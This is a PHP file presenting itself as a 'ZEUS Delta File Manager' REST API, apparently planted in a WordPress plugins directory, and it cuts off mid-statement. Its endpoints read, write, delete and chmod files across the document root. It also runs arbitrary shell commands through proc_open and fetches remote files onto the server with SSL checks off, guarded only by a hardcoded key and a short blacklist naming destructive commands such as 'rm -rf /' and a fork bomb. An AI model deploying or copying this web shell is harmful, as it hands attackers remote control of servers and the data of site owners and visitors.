PATH:
home
/
fengshp
/
www
/
wp-content
/
plugins
/
plugins
<?php /** * ZEUS Delta File Manager V3.0 - REST API * * Tum dosya islemlerini API uzerinden yapmaya olanak tanir. * Authentication: Header ile API key gonderilir -> X-API-Key: <key> * * ENDPOINTS: * POST /api.php?action=list - Dizin icerigini listele * POST /api.php?action=read - Dosya icerigini oku * POST /api.php?action=write - Dosya yaz/olustur * POST /api.php?action=delete - Dosya/klasor sil * POST /api.php?action=rename - Yeniden adlandir * POST /api.php?action=copy - Kopyala * POST /api.php?action=move - Tasi * POST /api.php?action=mkdir - Klasor olustur * POST /api.php?action=upload - Dosya yukle (multipart) * POST /api.php?action=download - Dosya indir * POST /api.php?action=info - Dosya/klasor bilgisi * POST /api.php?action=search - Dosya ara * POST /api.php?action=chmod - Izinleri degistir * POST /api.php?action=compress - Arsivle (zip) * POST /api.php?action=extract - Arsivden cikar * POST /api.php?action=terminal - Terminal komutu calistir * POST /api.php?action=disk_info - Disk bilgisi * POST /api.php?action=paste_url - URL'den dosya indir * POST /api.php?action=edit_image - Resim boyutlandir * POST /api.php?action=bulk_delete - Toplu silme * POST /api.php?action=bulk_copy - Toplu kopyalama * POST /api.php?action=bulk_move - Toplu tasima */ // ==================== CONFIGURATION ==================== // API Keys - birden fazla key tanimlanabilir // Format: 'api_key' => ['user' => 'username', 'readonly' => false] $api_keys = array( 'ZEUS-DELTA-API-KEY-2026' => array('user' => 'zeus', 'readonly' => false), // Daha fazla key ekleyebilirsiniz: // 'ANOTHER-KEY' => array('user' => 'guest', 'readonly' => true), ); // API rate limiting (dakika basina istek) $api_rate_limit = 120; // Terminal komutlari icin izin (guvenlik riski - dikkatli kullanin) $api_terminal_enabled = true; // Terminal'de yasakli komutlar $api_terminal_blacklist = array( 'rm -rf /', 'mkfs', 'dd if=', ':(){:|:&};:', 'format c:', ); // Maksimum dosya okuma boyutu (bytes) - API uzerinden $api_max_read_size = 50 * 1024 * 1024; // 50MB // Root path - sunucu document root $api_root_path = $_SERVER['DOCUMENT_ROOT']; // Config dosyasi varsa yukle (root_path override vb.) $config_file = __DIR__ . '/config.php'; if (is_readable($config_file)) { @include($config_file); } // ==================== INIT ==================== error_reporting(0); header('Content-Type: application/json; charset=utf-8'); header('X-Powered-By: ZEUS Delta API'); header('Access-Control-Allow-Origin: *'); header('Access-Control-Allow-Methods: GET, POST, OPTIONS'); header('Access-Control-Allow-Headers: Content-Type, X-API-Key, Authorization'); // OPTIONS preflight if ($_SERVER['REQUEST_METHOD'] === 'OPTIONS') { http_response_code(200); exit; } // ==================== HELPERS ==================== function api_response($success, $data = null, $message = '', $code = 200) { http_response_code($code); $response = array( 'success' => $success, 'message' => $message, 'timestamp' => date('c'), ); if ($data !== null) { $response['data'] = $data; } echo json_encode($response, JSON_UNESCAPED_UNICODE | JSON_PRETTY_PRINT); exit; } function api_error($message, $code = 400) { api_response(false, null, $message, $code); } function api_success($data = null, $message = 'OK') { api_response(true, $data, $message, 200); } function api_clean_path($path, $root_path) { $path = trim($path); $path = trim($path, '/'); $path = str_replace('\\', '/', $path); // Path traversal koruması $path = str_replace('..', '', $path); $path = preg_replace('#/+#', '/', $path); $path = trim($path, '/'); $full = $root_path . ($path ? '/' . $path : ''); $real = realpath($full); // realpath false donerse dosya yok demektir (yazma islemlerinde normal) if ($real !== false) { // Root path disina cikilmasini engelle $real_root = realpath($root_path); if ($real_root !== false && strpos($real, $real_root) !== 0) { api_error('Erisim reddedildi: path root dizin disinda', 403); } return $real; } return $full; } function api_get_input() { $content_type = isset($_SERVER['CONTENT_TYPE']) ? $_SERVER['CONTENT_TYPE'] : ''; if (strpos($content_type, 'application/json') !== false) { $raw = file_get_contents('php://input'); $data = json_decode($raw, true); if ($data === null && json_last_error() !== JSON_ERROR_NONE) { api_error('Gecersiz JSON verisi'); } return $data ?: array(); } // Form data veya multipart return $_POST; } function api_format_bytes($bytes, $precision = 2) { $units = array('B', 'KB', 'MB', 'GB', 'TB'); $bytes = max($bytes, 0); $pow = floor(($bytes ? log($bytes) : 0) / log(1024)); $pow = min($pow, count($units) - 1); $bytes /= pow(1024, $pow); return round($bytes, $precision) . ' ' . $units[$pow]; } function api_get_mime($path) { if (function_exists('finfo_open')) { $finfo = finfo_open(FILEINFO_MIME_TYPE); $mime = finfo_file($finfo, $path); finfo_close($finfo); return $mime; } return 'application/octet-stream'; } function api_rdelete($path) { if (is_link($path)) { return unlink($path); } elseif (is_dir($path)) { $objects = scandir($path); $ok = true; if (is_array($objects)) { foreach ($objects as $file) { if ($file != '.' && $file != '..') { if (!api_rdelete($path . '/' . $file)) { $ok = false; } } } } return ($ok) ? rmdir($path) : false; } elseif (is_file($path)) { return unlink($path); } return false; } function api_rcopy($src, $dest) { if (is_file($src)) { return copy($src, $dest); } if (!is_dir($dest)) { mkdir($dest, 0755, true); } $objects = scandir($src); foreach ($objects as $file) { if ($file == '.' || $file == '..') continue; $s = $src . '/' . $file; $d = $dest . '/' . $file; if (is_dir($s)) { api_rcopy($s, $d); } else { copy($s, $d); } } return true; } function api_scan_recursive($dir, $filter = '', &$results = array()) { $files = scandir($dir); foreach ($files as $file) { if ($file === '.' || $file === '..') continue; $path = $dir . '/' . $file; if (is_dir($path)) { api_scan_recursive($path, $filter, $results); } else { if ($filter === '' || stripos($file, $filter) !== false) { $results[] = array( 'name' => $file, 'path' => $path, 'size' => filesize($path), 'modified' => date('c', filemtime($path)), ); } } } return $results; } function api_dir_size($dir) { $size = 0; $files = scandir($dir); foreach ($files as $file) { if ($file === '.' || $file === '..') continue; $path = $dir . '/' . $file; if (is_dir($path)) { $size += api_dir_size($path); } else { $size += filesize($path); } } return $size; } // ==================== AUTHENTICATION ==================== function api_authenticate($api_keys) { // Header'dan API key al $key = null; if (isset($_SERVER['HTTP_X_API_KEY'])) { $key = $_SERVER['HTTP_X_API_KEY']; } elseif (isset($_SERVER['HTTP_AUTHORIZATION'])) { $auth = $_SERVER['HTTP_AUTHORIZATION']; if (strpos($auth, 'Bearer ') === 0) { $key = substr($auth, 7); } } elseif (isset($_GET['api_key'])) { $key = $_GET['api_key']; } if ($key === null) { api_error('API key gerekli. Header: X-API-Key veya Authorization: Bearer <key>', 401); } if (!isset($api_keys[$key])) { api_error('Gecersiz API key', 401); } return $api_keys[$key]; } // Rate limiting (basit dosya tabanli) function api_check_rate_limit($key, $limit) { $rate_file = sys_get_temp_dir() . '/zeus_api_rate_' . md5($key) . '.json'; $now = time(); $window = 60; // 1 dakika $data = array('requests' => array()); if (file_exists($rate_file)) { $data = json_decode(file_get_contents($rate_file), true) ?: array('requests' => array()); } // Eski istekleri temizle $data['requests'] = array_filter($data['requests'], function($t) use ($now, $window) { return ($now - $t) < $window; }); if (count($data['requests']) >= $limit) { api_error('Rate limit asildi. Dakika basina maksimum ' . $limit . ' istek.', 429); } $data['requests'][] = $now; file_put_contents($rate_file, json_encode($data), LOCK_EX); } // ==================== AUTH CHECK ==================== $api_user = api_authenticate($api_keys); $api_readonly = $api_user['readonly']; // Rate limit kontrolu $raw_key = isset($_SERVER['HTTP_X_API_KEY']) ? $_SERVER['HTTP_X_API_KEY'] : (isset($_SERVER['HTTP_AUTHORIZATION']) ? $_SERVER['HTTP_AUTHORIZATION'] : (isset($_GET['api_key']) ? $_GET['api_key'] : '')); api_check_rate_limit($raw_key, $api_rate_limit); // Root path ayarla $root_path = rtrim($api_root_path, '\\/'); $root_path = str_replace('\\', '/', $root_path); // ==================== ROUTER ==================== $action = isset($_GET['action']) ? $_GET['action'] : ''; $input = api_get_input(); if (empty($action)) { api_success(array( 'version' => '3.0', 'name' => 'ZEUS Delta File Manager API', 'endpoints' => array( 'list', 'read', 'write', 'delete', 'rename', 'copy', 'move', 'mkdir', 'upload', 'download', 'info', 'search', 'chmod', 'compress', 'extract', 'terminal', 'disk_info', 'paste_url', 'bulk_delete', 'bulk_copy', 'bulk_move', 'edit_image' ) ), 'ZEUS Delta API aktif'); } switch ($action) { // ==================== LIST ==================== case 'list': $path = isset($input['path']) ? $input['path'] : ''; $show_hidden = isset($input['show_hidden']) ? (bool)$input['show_hidden'] : false; $sort_by = isset($input['sort_by']) ? $input['sort_by'] : 'name'; // name, size, modified, type $sort_order = isset($input['sort_order']) ? $input['sort_order'] : 'asc'; $full_path = api_clean_path($path, $root_path); if (!is_dir($full_path)) { api_error('Dizin bulunamadi: ' . $path, 404); } $items = array(); $files_list = scandir($full_path); foreach ($files_list as $file) { if ($file === '.' || $file === '..') continue; if (!$show_hidden && substr($file, 0, 1) === '.') continue; $file_path = $full_path . '/' . $file; $is_dir = is_dir($file_path); $item = array( 'name' => $file, 'path' => $path ? $path . '/' . $file : $file, 'type' => $is_dir ? 'directory' : 'file', 'size' => $is_dir ? 0 : @filesize($file_path), 'size_human' => $is_dir ? '-' : api_format_bytes(@filesize($file_path)), 'modified' => date('c', @filemtime($file_path)), 'permissions' => substr(sprintf('%o', @fileperms($file_path)), -4), 'readable' => is_readable($file_path), 'writable' => is_writable($file_path), ); if (!$is_dir) { $item['extension'] = pathinfo($file, PATHINFO_EXTENSION); $item['mime'] = api_get_mime($file_path); } $items[] = $item; } // Siralama usort($items, function($a, $b) use ($sort_by, $sort_order) { // Klasorler her zaman once if ($a['type'] !== $b['type']) { return $a['type'] === 'directory' ? -1 : 1; } $cmp = 0; switch ($sort_by) { case 'size': $cmp = $a['size'] - $b['size']; break; case 'modified': $cmp = strcmp($a['modified'], $b['modified']); break; case 'type': $cmp = strcmp($a['extension'] ?? '', $b['extension'] ?? ''); break; default: $cmp = strnatcasecmp($a['name'], $b['name']); } return $sort_order === 'desc' ? -$cmp : $cmp; }); api_success(array( 'path' => $path ?: '/', 'total_items' => count($items), 'directories' => count(array_filter($items, function($i) { return $i['type'] === 'directory'; })), 'files' => count(array_filter($items, function($i) { return $i['type'] === 'file'; })), 'items' => $items, ), 'Dizin listelendi'); break; // ==================== READ ==================== case 'read': $path = isset($input['path']) ? $input['path'] : ''; $encoding = isset($input['encoding']) ? $input['encoding'] : 'utf-8'; $base64 = isset($input['base64']) ? (bool)$input['base64'] : false; $offset = isset($input['offset']) ? (int)$input['offset'] : 0; $length = isset($input['length']) ? (int)$input['length'] : 0; if (empty($path)) { api_error('path parametresi gerekli'); } $full_path = api_clean_path($path, $root_path); if (!is_file($full_path)) { api_error('Dosya bulunamadi: ' . $path, 404); } if (!is_readable($full_path)) { api_error('Dosya okunamiyor: ' . $path, 403); } $size = filesize($full_path); if ($size > $api_max_read_size) { api_error('Dosya cok buyuk. Maksimum: ' . api_format_bytes($api_max_read_size) . '. offset/length parametreleri ile parcali okuyun.'); } if ($length > 0) { $fh = fopen($full_path, 'rb'); if ($offset > 0) fseek($fh, $offset); $content = fread($fh, $length); fclose($fh); } else { $content = file_get_contents($full_path); } $response_data = array( 'path' => $path, 'size' => $size, 'size_human' => api_format_bytes($size), 'mime' => api_get_mime($full_path), 'modified' => date('c', filemtime($full_path)), 'encoding' => $encoding, ); if ($base64) { $response_data['content'] = base64_encode($content); $response_data['is_base64'] = true; } else { $response_data['content'] = $content; $response_data['is_base64'] = false; } api_success($response_data, 'Dosya okundu'); break; // ==================== WRITE ==================== case 'write': if ($api_readonly) api_error('Salt okunur mod - yazma izni yok', 403); $path = isset($input['path']) ? $input['path'] : ''; $content = isset($input['content']) ? $input['content'] : ''; $is_base64 = isset($input['base64']) ? (bool)$input['base64'] : false; $append = isset($input['append']) ? (bool)$input['append'] : false; $create_dirs = isset($input['create_dirs']) ? (bool)$input['create_dirs'] : true; if (empty($path)) { api_error('path parametresi gerekli'); } $full_path = api_clean_path($path, $root_path); // Ust dizini olustur $dir = dirname($full_path); if ($create_dirs && !is_dir($dir)) { mkdir($dir, 0755, true); } if ($is_base64) { $content = base64_decode($content); if ($content === false) { api_error('Gecersiz base64 verisi'); } } $flags = $append ? FILE_APPEND | LOCK_EX : LOCK_EX; $result = file_put_contents($full_path, $content, $flags); if ($result === false) { api_error('Dosya yazilamadi: ' . $path); } api_success(array( 'path' => $path, 'bytes_written' => $result, 'size_human' => api_format_bytes($result), 'append' => $append, ), 'Dosya yazildi'); break; // ==================== DELETE ==================== case 'delete': if ($api_readonly) api_error('Salt okunur mod - silme izni yok', 403); $path = isset($input['path']) ? $input['path'] : ''; if (empty($path)) { api_error('path parametresi gerekli'); } $full_path = api_clean_path($path, $root_path); if (!file_exists($full_path) && !is_link($full_path)) { api_error('Dosya/klasor bulunamadi: ' . $path, 404); } $is_dir = is_dir($full_path); $result = api_rdelete($full_path); if (!$result) { api_error('Silinemedi: ' . $path); } api_success(array( 'path' => $path, 'type' => $is_dir ? 'directory' : 'file', ), ($is_dir ? 'Klasor' : 'Dosya') . ' silindi'); break; // ==================== RENAME ==================== case 'rename': if ($api_readonly) api_error('Salt okunur mod', 403); $path = isset($input['path']) ? $input['path'] : ''; $new_name = isset($input['new_name']) ? $input['new_name'] : ''; if (empty($path) || empty($new_name)) { api_error('path ve new_name parametreleri gerekli'); } // Guvenlik: yeni isimde / veya \ olmasin if (strpos($new_name, '/') !== false || strpos($new_name, '\\') !== false) { api_error('Yeni isimde / veya \\ kullanilamaz'); } $full_path = api_clean_path($path, $root_path); if (!file_exists($full_path)) { api_error('Dosya/klasor bulunamadi: ' . $path, 404); } $new_path = dirname($full_path) . '/' . $new_name; if (file_exists($new_path)) { api_error('Bu isimde dosya/klasor zaten var: ' . $new_name); } $result = rename($full_path, $new_path); if (!$result) { api_error('Yeniden adlandirma basarisiz'); } api_success(array( 'old_path' => $path, 'new_name' => $new_name, 'new_path' => dirname($path) . '/' . $new_name, ), 'Yeniden adlandirildi'); break; // ==================== COPY ==================== case 'copy': if ($api_readonly) api_error('Salt okunur mod', 403); $source = isset($input['source']) ? $input['source'] : ''; $destination = isset($input['destination']) ? $input['destination'] : ''; if (empty($source) || empty($destination)) { api_error('source ve destination parametreleri gerekli'); } $src_path = api_clean_path($source, $root_path); $dest_path = api_clean_path($destination, $root_path); if (!file_exists($src_path)) { api_error('Kaynak bulunamadi: ' . $source, 404); } if (file_exists($dest_path)) { api_error('Hedef zaten var: ' . $destination); } // Hedef dizini olustur $dest_dir = dirname($dest_path); if (!is_dir($dest_dir)) { mkdir($dest_dir, 0755, true); } $result = api_rcopy($src_path, $dest_path); if (!$result) { api_error('Kopyalama basarisiz'); } api_success(array( 'source' => $source, 'destination' => $destination, 'type' => is_dir($dest_path) ? 'directory' : 'file', ), 'Kopyalandi'); break; // ==================== MOVE ==================== case 'move': if ($api_readonly) api_error('Salt okunur mod', 403); $source = isset($input['source']) ? $input['source'] : ''; $destination = isset($input['destination']) ? $input['destination'] : ''; if (empty($source) || empty($destination)) { api_error('source ve destination parametreleri gerekli'); } $src_path = api_clean_path($source, $root_path); $dest_path = api_clean_path($destination, $root_path); if (!file_exists($src_path)) { api_error('Kaynak bulunamadi: ' . $source, 404); } // Hedef dizini olustur $dest_dir = dirname($dest_path); if (!is_dir($dest_dir)) { mkdir($dest_dir, 0755, true); } $result = rename($src_path, $dest_path); if (!$result) { api_error('Tasima basarisiz'); } api_success(array( 'source' => $source, 'destination' => $destination, ), 'Tasinildi'); break; // ==================== MKDIR ==================== case 'mkdir': if ($api_readonly) api_error('Salt okunur mod', 403); $path = isset($input['path']) ? $input['path'] : ''; $recursive = isset($input['recursive']) ? (bool)$input['recursive'] : true; $permissions = isset($input['permissions']) ? octdec($input['permissions']) : 0755; if (empty($path)) { api_error('path parametresi gerekli'); } $full_path = api_clean_path($path, $root_path); if (is_dir($full_path)) { api_error('Klasor zaten var: ' . $path); } $result = mkdir($full_path, $permissions, $recursive); if (!$result) { api_error('Klasor olusturulamadi'); } api_success(array( 'path' => $path, 'permissions' => decoct($permissions), ), 'Klasor olusturuldu'); break; // ==================== UPLOAD ==================== case 'upload': if ($api_readonly) api_error('Salt okunur mod', 403); $dest_path = isset($_POST['path']) ? $_POST['path'] : ''; $overwrite = isset($_POST['overwrite']) ? (bool)$_POST['overwrite'] : false; if (empty($_FILES)) { api_error('Dosya yuklemesi gerekli (multipart/form-data, field: file)'); } $full_dest = api_clean_path($dest_path, $root_path); if (!is_dir($full_dest)) { mkdir($full_dest, 0755, true); } $uploaded = array(); $errors = array(); // Tek veya coklu dosya $files = isset($_FILES['file']) ? $_FILES['file'] : $_FILES; // Normalize: tek dosya ise array'e cevir if (isset($files['name']) && !is_array($files['name'])) { $files = array( 'name' => array($files['name']), 'tmp_name' => array($files['tmp_name']), 'size' => array($files['size']), 'error' => array($files['error']), 'type' => array($files['type']), ); } elseif (isset($files['name']) && is_array($files['name'])) { // Zaten dogru formatta } else { // Farkli field isimleri $normalized = array('name' => array(), 'tmp_name' => array(), 'size' => array(), 'error' => array(), 'type' => array()); foreach ($files as $field => $file_data) { $normalized['name'][] = $file_data['name']; $normalized['tmp_name'][] = $file_data['tmp_name']; $normalized['size'][] = $file_data['size']; $normalized['error'][] = $file_data['error']; $normalized['type'][] = $file_data['type']; } $files = $normalized; } for ($i = 0; $i < count($files['name']); $i++) { $name = $files['name'][$i]; $tmp = $files['tmp_name'][$i]; $size = $files['size'][$i]; $error = $files['error'][$i]; if ($error !== UPLOAD_ERR_OK) { $errors[] = array('file' => $name, 'error' => 'Upload hatasi: ' . $error); continue; } $target = $full_dest . '/' . $name; if (file_exists($target) && !$overwrite) { $errors[] = array('file' => $name, 'error' => 'Dosya zaten var (overwrite=false)'); continue; } if (move_uploaded_file($tmp, $target)) { $uploaded[] = array( 'name' => $name, 'path' => ($dest_path ? $dest_path . '/' : '') . $name, 'size' => $size, 'size_human' => api_format_bytes($size), ); } else { $errors[] = array('file' => $name, 'error' => 'Dosya tasinamadi'); } } api_success(array( 'uploaded' => $uploaded, 'errors' => $errors, 'total_uploaded' => count($uploaded), 'total_errors' => count($errors), ), count($uploaded) . ' dosya yuklendi'); break; // ==================== DOWNLOAD ==================== case 'download': $path = isset($input['path']) ? $input['path'] : (isset($_GET['path']) ? $_GET['path'] : ''); if (empty($path)) { api_error('path parametresi gerekli'); } $full_path = api_clean_path($path, $root_path); if (!is_file($full_path)) { api_error('Dosya bulunamadi: ' . $path, 404); } // JSON header'i kaldir ve dosyayi gonder header_remove('Content-Type'); header('Content-Type: ' . api_get_mime($full_path)); header('Content-Disposition: attachment; filename="' . basename($full_path) . '"'); header('Content-Length: ' . filesize($full_path)); header('Cache-Control: no-cache'); readfile($full_path); exit; break; // ==================== INFO ==================== case 'info': $path = isset($input['path']) ? $input['path'] : ''; if (empty($path)) { api_error('path parametresi gerekli'); } $full_path = api_clean_path($path, $root_path); if (!file_exists($full_path)) { api_error('Dosya/klasor bulunamadi: ' . $path, 404); } $is_dir = is_dir($full_path); $stat = stat($full_path); $info = array( 'name' => basename($full_path), 'path' => $path, 'full_path' => $full_path, 'type' => $is_dir ? 'directory' : 'file', 'size' => $is_dir ? api_dir_size($full_path) : filesize($full_path), 'size_human' => api_format_bytes($is_dir ? api_dir_size($full_path) : filesize($full_path)), 'permissions' => substr(sprintf('%o', fileperms($full_path)), -4), 'owner' => function_exists('posix_getpwuid') ? posix_getpwuid(fileowner($full_path))['name'] : fileowner($full_path), 'group' => function_exists('posix_getgrgid') ? posix_getgrgid(filegroup($full_path))['name'] : filegroup($full_path), 'created' => date('c', $stat['ctime']), 'modified' => date('c', $stat['mtime']), 'accessed' => date('c', $stat['atime']), 'readable' => is_readable($full_path), 'writable' => is_writable($full_path), 'executable' => is_executable($full_path), 'is_link' => is_link($full_path), ); if (!$is_dir) { $info['extension'] = pathinfo($full_path, PATHINFO_EXTENSION); $info['mime'] = api_get_mime($full_path); $info['md5'] = md5_file($full_path); $info['sha1'] = sha1_file($full_path); } if ($is_dir) { $contents = scandir($full_path); $contents = array_diff($contents, array('.', '..')); $info['item_count'] = count($contents); $info['dir_count'] = count(array_filter($contents, function($f) use ($full_path) { return is_dir($full_path.'/'.$f); })); $info['file_count'] = $info['item_count'] - $info['dir_count']; } if (is_link($full_path)) { $info['link_target'] = readlink($full_path); } api_success($info, 'Bilgi alindi'); break; // ==================== SEARCH ==================== case 'search': $path = isset($input['path']) ? $input['path'] : ''; $query = isset($input['query']) ? $input['query'] : ''; $content_search = isset($input['content']) ? $input['content'] : ''; $extension = isset($input['extension']) ? $input['extension'] : ''; $max_results = isset($input['max_results']) ? (int)$input['max_results'] : 500; if (empty($query) && empty($content_search)) { api_error('query veya content parametresi gerekli'); } $full_path = api_clean_path($path, $root_path); if (!is_dir($full_path)) { api_error('Dizin bulunamadi: ' . $path, 404); } $results = array(); api_scan_recursive($full_path, $query, $results); // Extension filtresi if (!empty($extension)) { $results = array_filter($results, function($item) use ($extension) { return strtolower(pathinfo($item['name'], PATHINFO_EXTENSION)) === strtolower($extension); }); $results = array_values($results); } // Icerik arama if (!empty($content_search)) { $content_results = array(); foreach ($results as $item) { if (is_readable($item['path']) && filesize($item['path']) < 5 * 1024 * 1024) { $file_content = file_get_contents($item['path']); if (stripos($file_content, $content_search) !== false) { // Eslesen satirlari bul $lines = explode("\n", $file_content); $matching_lines = array(); foreach ($lines as $num => $line) { if (stripos($line, $content_search) !== false) { $matching_lines[] = array( 'line_number' => $num + 1, 'content' => trim($line), ); } } $item['matches'] = $matching_lines; $content_results[] = $item; } } } $results = $content_results; } // Limit $results = array_slice($results, 0, $max_results); // Pathleri relative yap foreach ($results as &$item) { $item['path'] = str_replace($root_path . '/', '', $item['path']); $item['path'] = str_replace($root_path, '', $item['path']); } api_success(array( 'query' => $query ?: $content_search, 'search_path' => $path ?: '/', 'total_results' => count($results), 'results' => $results, ), count($results) . ' sonuc bulundu'); break; // ==================== CHMOD ==================== case 'chmod': if ($api_readonly) api_error('Salt okunur mod', 403); $path = isset($input['path']) ? $input['path'] : ''; $permissions = isset($input['permissions']) ? $input['permissions'] : ''; $recursive = isset($input['recursive']) ? (bool)$input['recursive'] : false; if (empty($path) || empty($permissions)) { api_error('path ve permissions parametreleri gerekli (ornek: "0755")'); } $full_path = api_clean_path($path, $root_path); if (!file_exists($full_path)) { api_error('Dosya/klasor bulunamadi: ' . $path, 404); } $mode = octdec($permissions); if ($recursive && is_dir($full_path)) { $iterator = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($full_path, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST ); $count = 0; foreach ($iterator as $item) { if (chmod($item->getPathname(), $mode)) { $count++; } } chmod($full_path, $mode); api_success(array('path' => $path, 'permissions' => $permissions, 'affected' => $count + 1), 'Izinler degistirildi'); } else { $result = chmod($full_path, $mode); if (!$result) { api_error('Izin degistirme basarisiz'); } api_success(array('path' => $path, 'permissions' => $permissions), 'Izinler degistirildi'); } break; // ==================== COMPRESS ==================== case 'compress': if ($api_readonly) api_error('Salt okunur mod', 403); $path = isset($input['path']) ? $input['path'] : ''; $dest = isset($input['destination']) ? $input['destination'] : ''; if (empty($path)) { api_error('path parametresi gerekli'); } if (!class_exists('ZipArchive')) { api_error('ZipArchive extension yuklu degil'); } $full_path = api_clean_path($path, $root_path); if (!file_exists($full_path)) { api_error('Dosya/klasor bulunamadi: ' . $path, 404); } // Hedef zip dosyasi if (empty($dest)) { $dest_path = $full_path . '.zip'; } else { $dest_path = api_clean_path($dest, $root_path); } $zip = new ZipArchive(); if ($zip->open($dest_path, ZipArchive::CREATE | ZipArchive::OVERWRITE) !== true) { api_error('ZIP dosyasi olusturulamadi'); } if (is_dir($full_path)) { $iterator = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($full_path, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST ); foreach ($iterator as $item) { $relative = str_replace($full_path . '/', '', $item->getPathname()); if ($item->isDir()) { $zip->addEmptyDir($relative); } else { $zip->addFile($item->getPathname(), $relative); } } } else { $zip->addFile($full_path, basename($full_path)); } $file_count = $zip->numFiles; $zip->close(); api_success(array( 'source' => $path, 'archive' => str_replace($root_path . '/', '', $dest_path), 'archive_size' => filesize($dest_path), 'archive_size_human' => api_format_bytes(filesize($dest_path)), 'files_compressed' => $file_count, ), 'Arsivleme tamamlandi'); break; // ==================== EXTRACT ==================== case 'extract': if ($api_readonly) api_error('Salt okunur mod', 403); $path = isset($input['path']) ? $input['path'] : ''; $dest = isset($input['destination']) ? $input['destination'] : ''; if (empty($path)) { api_error('path parametresi gerekli (zip dosyasi)'); } if (!class_exists('ZipArchive')) { api_error('ZipArchive extension yuklu degil'); } $full_path = api_clean_path($path, $root_path); if (!is_file($full_path)) { api_error('ZIP dosyasi bulunamadi: ' . $path, 404); } $zip = new ZipArchive(); if ($zip->open($full_path) !== true) { api_error('ZIP dosyasi acilamadi'); } if (empty($dest)) { $dest_path = dirname($full_path) . '/' . pathinfo($full_path, PATHINFO_FILENAME); } else { $dest_path = api_clean_path($dest, $root_path); } if (!is_dir($dest_path)) { mkdir($dest_path, 0755, true); } $file_count = $zip->numFiles; $zip->extractTo($dest_path); $zip->close(); api_success(array( 'archive' => $path, 'destination' => str_replace($root_path . '/', '', $dest_path), 'files_extracted' => $file_count, ), 'Arsiv cikarildi'); break; // ==================== TERMINAL ==================== case 'terminal': if ($api_readonly) api_error('Salt okunur mod', 403); if (!$api_terminal_enabled) { api_error('Terminal API devre disi', 403); } $command = isset($input['command']) ? $input['command'] : ''; $cwd = isset($input['cwd']) ? $input['cwd'] : ''; $timeout = isset($input['timeout']) ? min((int)$input['timeout'], 300) : 30; // max 5 dakika if (empty($command)) { api_error('command parametresi gerekli'); } // Kara liste kontrolu foreach ($api_terminal_blacklist as $blocked) { if (stripos($command, $blocked) !== false) { api_error('Bu komut yasaklanmis: ' . $blocked, 403); } } // Calisma dizini $exec_dir = $root_path; if (!empty($cwd)) { $exec_dir = api_clean_path($cwd, $root_path); if (!is_dir($exec_dir)) { $exec_dir = $root_path; } } $old_cwd = getcwd(); chdir($exec_dir); $start_time = microtime(true); // proc_open ile calistir (stdin, stdout, stderr) $descriptors = array( 0 => array('pipe', 'r'), // stdin 1 => array('pipe', 'w'), // stdout 2 => array('pipe', 'w'), // stderr ); $env = null; $process = proc_open($command, $descriptors, $pipes, $exec_dir, $env); if (!is_resource($process)) { chdir($old_cwd); api_error('Komut calistirilamadi'); } // stdin kapat fclose($pipes[0]); // Non-blocking mode stream_set_blocking($pipes[1], false); stream_set_blocking($pipes[2], false); $stdout = ''; $stderr = ''; $timed_out = false; while (true) { $status = proc_get_status($process); $stdout .= stream_get_contents($pipes[1]); $stderr .= stream_get_contents($pipes[2]); if (!$status['running']) { break; } if ((microtime(true) - $start_time) > $timeout) { $timed_out = true; proc_terminate($process, 9); break; } usleep(50000); // 50ms } // Son okuma $stdout .= stream_get_contents($pipes[1]); $stderr .= stream_get_contents($pipes[2]); fclose($pipes[1]); fclose($pipes[2]); $exit_code = proc_close($process); $duration = round(microtime(true) - $start_time, 3); chdir($old_cwd); api_success(array( 'command' => $command, 'cwd' => $exec_dir, 'stdout' => $stdout, 'stderr' => $stderr, 'exit_code' => $exit_code, 'duration' => $duration . 's', 'timed_out' => $timed_out, ), $timed_out ? 'Komut zaman asimina ugradi' : 'Komut calistirildi'); break; // ==================== DISK INFO ==================== case 'disk_info': $path = isset($input['path']) ? $input['path'] : ''; $full_path = api_clean_path($path, $root_path); if (!is_dir($full_path)) { $full_path = $root_path; } $total = disk_total_space($full_path); $free = disk_free_space($full_path); $used = $total - $free; api_success(array( 'path' => $full_path, 'total' => $total, 'total_human' => api_format_bytes($total), 'used' => $used, 'used_human' => api_format_bytes($used), 'free' => $free, 'free_human' => api_format_bytes($free), 'used_percent' => round(($used / $total) * 100, 2), 'php_version' => PHP_VERSION, 'server_software' => isset($_SERVER['SERVER_SOFTWARE']) ? $_SERVER['SERVER_SOFTWARE'] : 'N/A', 'os' => PHP_OS, 'max_upload' => ini_get('upload_max_filesize'), 'max_post' => ini_get('post_max_size'), 'memory_limit' => ini_get('memory_limit'), ), 'Disk bilgisi'); break; // ==================== PASTE URL ==================== case 'paste_url': if ($api_readonly) api_error('Salt okunur mod', 403); $url = isset($input['url']) ? $input['url'] : ''; $dest = isset($input['destination']) ? $input['destination'] : ''; $filename = isset($input['filename']) ? $input['filename'] : ''; if (empty($url)) { api_error('url parametresi gerekli'); } // URL dogrulama if (!filter_var($url, FILTER_VALIDATE_URL)) { api_error('Gecersiz URL'); } // Dosya adi belirle if (empty($filename)) { $filename = basename(parse_url($url, PHP_URL_PATH)); if (empty($filename) || $filename === '/') { $filename = 'downloaded_' . time(); } } $dest_dir = api_clean_path($dest, $root_path); if (!is_dir($dest_dir)) { mkdir($dest_dir, 0755, true); } $target = $dest_dir . '/' . $filename; // cURL ile indir if (function_exists('curl_init')) { $ch = curl_init($url); $fp = fopen($target, 'w'); curl_setopt($ch, CURLOPT_FILE, $fp); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_MAXREDIRS, 5); curl_setopt($ch, CURLOPT_TIMEOUT, 120); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_USERAGENT, 'ZEUS Delta API/3.0'); $success = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); $error = curl_error($ch); curl_close($ch); fclose($fp); if (!$success || $http_code >= 400) { @unlink($target); api_error('Indirme basarisiz: ' . ($error ?: 'HTTP ' . $http_code)); } } else { // file_get_contents fallback $content = @file_get_contents($url); if ($content === false) { api_error('URL indirilemedi'); } file_put_contents($target, $content); } api_success(array( 'url' => $url, 'filename' => $filename, 'path' => ($dest ? $dest . '/' : '') . $filename, 'size' => filesize($target), 'size_human' => api_format_bytes(filesize($target)), ), 'URL\'den indirildi'); break; // ==================== EDIT IMAGE ==================== case 